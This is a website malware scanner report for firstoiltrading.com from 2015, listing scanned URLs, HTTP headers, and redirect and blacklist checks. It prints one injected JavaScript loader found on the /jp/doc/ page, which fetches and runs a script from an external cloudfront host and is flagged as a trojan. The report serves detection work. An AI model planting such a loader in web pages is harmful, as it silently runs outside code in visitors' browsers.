New scan:

Malware Scanner report for firstoiltrading.com

Malicious/Suspicious/Total urls checked
1/0/20
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://firstoiltrading.com/jp/doc
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Mar 2015 11:57:57 GMT
Location: http://firstoiltrading.com/jp/doc/
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 430
Content-Type: text/html; charset=iso-8859-1
clean
http://firstoiltrading.com/jp/doc/
200 OK
Content-Length: 13938
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

(typeof _GPL_16_loaded == 'undefined') && (_GPL_16_loaded=true) && (_GPL_i=document.getElementsByTagName('head')) && (_GPL_i=(_GPL_i.length>0)?_GPL_i:document.getElementsByTagName('body')) && (_GPL_i.length>0) && (_GPL_j=document.createElement('script')) && (_GPL_j.async=true) && (_GPL_j.type='text/javascript') && (_GPL_j.src='https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_16.js?pid=16&zoneid=7818&cid=US&rid=NV&ccid=Fernley&ip=199.48.177.231&aoi=1316649369') && (_GPL_i[0].appendChild(_GPL_j))

Antivirus reports:

Kaspersky
Trojan.JS.Iframe.ahd

http://firstoiltrading.com/test404page.js
200 OK
Content-Length: 113
Content-Type: text/html
clean
http://autollopart.com/stooper.php?id=100836
HTTP/1.1 302 Found
Connection: close
Date: Tue, 03 Mar 2015 11:58:03 GMT
Location: http://bing.com
Server: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.35
clean
http://bing.com/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Date: Tue, 03 Mar 2015 11:58:04 GMT
Location: http://www.bing.com/
Server: Microsoft-IIS/8.5
Content-Length: 0
Edge-Control: no-store
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Set-Cookie: _HOP=I=1&TS=1425383885; domain=bing.com; path=/
X-MSEdge-Ref: Ref A: 9F41B3DE9DBA41D19C14750733A98F51 Ref B: 3ADCF9F9595BB32E4F9CF21FF9A85300 Ref C: Tue Mar 03 03:58:05 2015 PST
clean
http://www.bing.com/
200 OK
Content-Length: 57048
Content-Type: text/html
clean
http://www.bing.com/?scope=web&FORM=Z9LH
200 OK
Content-Length: 57164
Content-Type: text/html
clean
http://www.bing.com/?scope=images&FORM=Z9LH1
200 OK
Content-Length: 57181
Content-Type: text/html
clean
http://www.bing.com/?scope=video&FORM=Z9LH2
200 OK
Content-Length: 57176
Content-Type: text/html
clean
http://www.bing.com/news?FORM=Z9LH3
200 OK
Content-Length: 88992
Content-Type: text/html
clean
http://www.bing.com/rms/rms%20answers%20News%20Vertical$newsSmartRefresh/jc/06505c61/092426a2.js?y
200 OK
Content-Length: 674
Content-Type: application/x-javascript
clean
http://www.bing.com/rms/news4B/jc/f44b81d8/0e31551f.js?bu=rms+answers+News+Vertical%24domready%2cVertical%24newsBrowseCommonV6%2cVertical%24scroller%2cVertical%24baseInst%2cVertical%24makehomepage&y
200 OK
Content-Length: 11956
Content-Type: application/x-javascript
clean
http://www.bing.com/search?q=&FORM=HDRSC1
HTTP/1.1 302 Found
Cache-Control: private
Date: Tue, 03 Mar 2015 11:58:07 GMT
Location: /?scope=web&mkt=en-ww&FORM=HDRSC1
Server: Microsoft-IIS/8.5
Vary: Accept-Encoding
Content-Length: 158
Content-Type: text/html; charset=utf-8
Edge-Control: no-store
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Set-Cookie: _FS=NU=1; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1425383887; domain=.bing.com; path=/
Set-Cookie: _SS=SID=67DCD38D968E4CFF845E0846C9966F92; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=HDRSC1; expires=Thu, 02-Mar-2017 11:58:07 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=9C3C653D4EEF4D508F4F5D53BB7609D0; expires=Thu, 02-Mar-2017 11:58:07 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20150303; expires=Thu, 02-Mar-2017 11:58:07 GMT; domain=.bing.com; path=/
Set-Cookie: _EDGE_S=F=1&SID=2AF0D4CB835867693619D39482BC66DC; path=/; httponly; domain=bing.com
Set-Cookie: _EDGE_V=1; path=/; httponly; expires=Thu, 02-Mar-2017 11:58:07 GMT; domain=bing.com
Set-Cookie: MUID=23C9A56BC14B604218E7A234C0AF611D; path=/; expires=Thu, 02-Mar-2017 11:58:07 GMT; domain=bing.com
Set-Cookie: MUIDB=23C9A56BC14B604218E7A234C0AF611D; path=/; httponly; expires=Thu, 02-Mar-2017 11:58:07 GMT
X-MSEdge-Ref: Ref A: E902875AB5FE486284F8ED9EE1814380 Ref B: CB174FBE0E0A048985278ABCE1BC1A00 Ref C: Tue Mar 03 03:58:07 2015 PST
clean
http://www.bing.com/?scope=web&mkt=en-ww&form=hdrsc1
200 OK
Content-Length: 57210
Content-Type: text/html
clean
http://www.bing.com/explore?FORM=Z9LH4
200 OK
Content-Length: 28508
Content-Type: text/html
clean
http://www.bing.com/images/search?q=&FORM=HDRSC2
HTTP/1.1 302 Found
Cache-Control: private
Date: Tue, 03 Mar 2015 11:58:07 GMT
Location: /?scope=images&nr=1&FORM=NOFORM
Server: Microsoft-IIS/8.5
Vary: Accept-Encoding
Content-Length: 156
Content-Type: text/html; charset=utf-8
Edge-Control: no-store
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Set-Cookie: _FS=NU=1; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1425383888; domain=.bing.com; path=/
Set-Cookie: _SS=SID=26098760A9E344779E89861EDFB533AD; domain=.bing.com; path=/
Set-Cookie: SRCHD=AF=HDRSC2; expires=Thu, 02-Mar-2017 11:58:08 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=DC3DB63363EF485D85319746D2F820C9; expires=Thu, 02-Mar-2017 11:58:08 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20150303; expires=Thu, 02-Mar-2017 11:58:08 GMT; domain=.bing.com; path=/
Set-Cookie: _EDGE_S=F=1&SID=15EF2EFBA53E61AE24BF29A4A4DA6042; path=/; httponly; domain=bing.com
Set-Cookie: _EDGE_V=1; path=/; httponly; expires=Thu, 02-Mar-2017 11:58:08 GMT; domain=bing.com
Set-Cookie: MUID=1A7A508B9456653C14B857D495B2642A; path=/; expires=Thu, 02-Mar-2017 11:58:08 GMT; domain=bing.com
Set-Cookie: MUIDB=1A7A508B9456653C14B857D495B2642A; path=/; httponly; expires=Thu, 02-Mar-2017 11:58:08 GMT
X-MSEdge-Ref: Ref A: 042C1C0E7612404DB9AFCC7601144AEF Ref B: B5993FBBE8009020004A4796E5B37C54 Ref C: Tue Mar 03 03:58:08 2015 PST
clean
http://www.bing.com/?scope=images&nr=1&form=noform
200 OK
Content-Length: 57210
Content-Type: text/html
clean
http://www.bing.com/account/general?ru=http%3a%2f%2fwww.bing.com%3a80%2f%3fscope%3dimages%26nr%3d1%26form%3dnoform&FORM=SEFD
200 OK
Content-Length: 46647
Content-Type: text/html
clean
http://www.bing.com/?FORM=HDRHME&pq=
200 OK
Content-Length: 57096
Content-Type: text/html
clean
http://www.bing.com/account/general?ru=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dHDRHME%26pq%3d&FORM=SEFD
200 OK
Content-Length: 46481
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: firstoiltrading.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: firstoiltrading.com
Referer: http://www.google.com/search?q=firstoiltrading.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=firstoiltrading.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://firstoiltrading.com/

Result: firstoiltrading.com is not infected or malware details are not published yet.